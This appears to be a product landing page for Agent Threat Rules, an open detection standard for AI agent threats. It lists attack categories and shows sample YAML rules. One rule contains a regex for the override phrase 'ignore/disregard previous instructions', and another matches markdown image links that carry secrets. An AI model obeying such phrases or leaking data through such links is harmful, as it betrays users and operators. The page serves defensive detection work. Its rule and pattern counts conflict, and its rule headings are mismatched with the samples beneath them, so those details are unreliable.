OPEN STANDARD
Agent Threat Rules (ATR)
The first open detection standard for AI agent threats. Machine-readable, community-driven, and designed for AI agent security.
THE PROBLEM
AI agents need purpose-built detection
Traditional security rules were designed for network packets and file hashes. They cannot understand prompt flows, tool calls, or multi-turn agent conversations.
AI agents introduce a new attack surface: prompt injection, tool poisoning, context exfiltration, skill compromise. These threats live in the semantic layer -- invisible to legacy detection tools.
ATR is the detection standard built for the AI agent era.
Traditional Rules
Log-based IOCs. No awareness of prompt context or tool interactions.
File Scanners
File-level byte patterns. Cannot inspect agent conversation flows.
ATR Rules
Semantic-layer detection. Built for prompts, tools, and agent behavior.
WHY ATR
Three standards. Three eras.
ATR fills the gap that traditional detection tools leave open for AI agent threats.
RULE CATEGORIES
11 categories. 311 rules. 1,600+ patterns.
Covering the full AI agent attack surface, mapped to OWASP Agentic Top 10 and MITRE ATLAS.
Prompt Injection
Direct and indirect injection, jailbreaks, system prompt override, multi-turn attacks, encoding evasion, CJK social engineering
Tool Poisoning
Malicious MCP responses, tool output injection, unauthorized tool calls, SSRF via tools, response piggyback
Context Exfiltration
System prompt leaks, API key exposure, credential theft, SSH key access, environment variable harvesting
Agent Manipulation
Cross-agent attacks, goal hijacking, inter-agent message spoofing, human trust exploitation, persona hijacking
Privilege Escalation
Tool permission escalation, scope creep, admin function access, cross-agent privilege escalation
Excessive Autonomy
Runaway agent loops, resource exhaustion, cascading pipeline failures
Skill Compromise
Supply chain poisoning, skill impersonation, hidden capabilities, chain attacks, description-behavior mismatch, rug pull, squatting
Data Poisoning
RAG retrieval poisoning, knowledge base contamination
Model Security
Model behavior extraction, malicious fine-tuning data detection
INTEGRATION
Where ATR fits in the stack
ATR rules are evaluated at the semantic layer -- between the LLM and the tools it invokes.
User Input
Prompt text, uploaded files, conversation context
ATR Engine
311 rules evaluated in <1ms per event. Block, alert, or escalate.
LLM / Agent
Claude, GPT, Gemini, local models -- any provider
Tools & Skills
MCP servers, OpenClaw skills, file system, shell, APIs
ATR intercepts at the semantic layer -- before malicious instructions reach the agent, and before compromised outputs reach the tools.
HOW IT WORKS
YAML rules. Real-time engine.
Write human-readable rules. The ATR engine matches them against live agent telemetry in milliseconds.
Define detection logic
Each rule specifies conditions on agent fields: user_input, tool_calls, model_output, context. Supports regex, keyword, and semantic operators.
Map to frameworks
Rules link to OWASP LLM Top 10 and MITRE ATLAS references, providing compliance coverage and threat context.
Engine evaluates in real-time
The ATR engine loads rules and matches them against agent events as they occur. Sub-millisecond evaluation per rule.
Automated response
When a rule triggers, configurable actions fire: block_input, alert, snapshot, escalate. Threshold-based auto-response prevents false positive fatigue.
title: "Direct Prompt Injection via User Input"
id: ATR-2026-001
status: experimental
severity: high
references:
owasp_llm:
- "LLM01:2025 - Prompt Injection"
detection:
conditions:
- field: user_input
operator: regex
value: "(?i)(ignore|disregard)\\s+previous\\s+instructions"
condition: any
response:
actions:
- block_input
- alert
- snapshotRULE EXAMPLES
Rules for real threats
Each rule targets a specific attack pattern observed in production AI agent deployments.
Tool Poisoning via MCP
Tool Poisoningtitle: "Direct Prompt Injection via User Input"
id: ATR-2026-001
status: experimental
severity: high
references:
owasp_llm:
- "LLM01:2025 - Prompt Injection"
detection:
conditions:
- field: user_input
operator: regex
value: "(?i)(ignore|disregard)\\s+previous\\s+instructions"
condition: any
response:
actions:
- block_input
- alert
- snapshotContext Exfiltration via Markdown
Context Exfiltrationtitle: "Tool Poisoning via MCP Response"
id: ATR-2026-008
status: experimental
severity: critical
references:
owasp_llm:
- "LLM02:2025 - Tool Misuse"
detection:
conditions:
- field: tool_output
operator: regex
value: "(eval|exec|child_process|__import__|subprocess\\.run)\\("
- field: tool_output
operator: contains
value: "import os"
condition: any
response:
actions:
- block_output
- alert
- block_toolExcessive Agent Autonomy Loop
Excessive Autonomytitle: "Context Exfiltration via Markdown"
id: ATR-2026-012
status: experimental
severity: high
detection:
conditions:
- field: model_output
operator: regex
value: "!\\[.*\\]\\(https?://[^)]+\\?.*="
- field: model_output
operator: regex
value: "(api_key|secret|token|password|credential)"
condition: all
response:
actions:
- block_output
- alert
- snapshotCOMPLIANCE MAPPING
OWASP Agentic Top 10 coverage
Every ATR rule maps to the OWASP Top 10 for Agentic Applications, providing structured coverage of the most critical AI agent security risks.
ECOSYSTEM
Open standard. Community-driven growth.
ATR follows the proven playbook of open standards -- open governance, community contributions, and vendor-neutral design.
110
Detection rules
714
Detection patterns
10/10
OWASP Agentic coverage
100%
SKILL.md recall
CONTRIBUTION FLOW
Identify a threat pattern
Observe a new attack vector in production, research, or CTF. Document the behavior.
Write an ATR rule
Define detection conditions in YAML. Map to OWASP and MITRE references. Add test cases.
Submit a pull request
The community reviews, tests, and merges. Rules ship to all ATR users automatically.
Collective defense
Every new rule strengthens the entire ecosystem. One contributor protects thousands of deployments.
ROADMAP
The standard evolves
Open Standard
- 311 rules, 1,600+ patterns across 11 categories
- RFC-001 v1.1 quality standard published
- Maturity levels: draft / experimental / stable
- Cisco AI Defense ships 34 ATR rules
- OWASP Agentic Top 10: 10/10 coverage
Collective Defense
- Threat Cloud crystallization pipeline
- GitHub Action for CI/CD scanning
- Hermes Agent integration (76K stars)
- RFC-002: Behavioral detection types
- RFC-003: Collective defense protocol
Enterprise Standard
- RFC-004: Enterprise deployment guidance
- EU AI Act compliance mapping
- Private rule feeds for enterprises
- Multi-agent fleet visibility
- Vendor certification program
Join the ATR community
ATR is open source and community-driven. Contribute rules, report new threat patterns, or integrate ATR into your own agent security stack.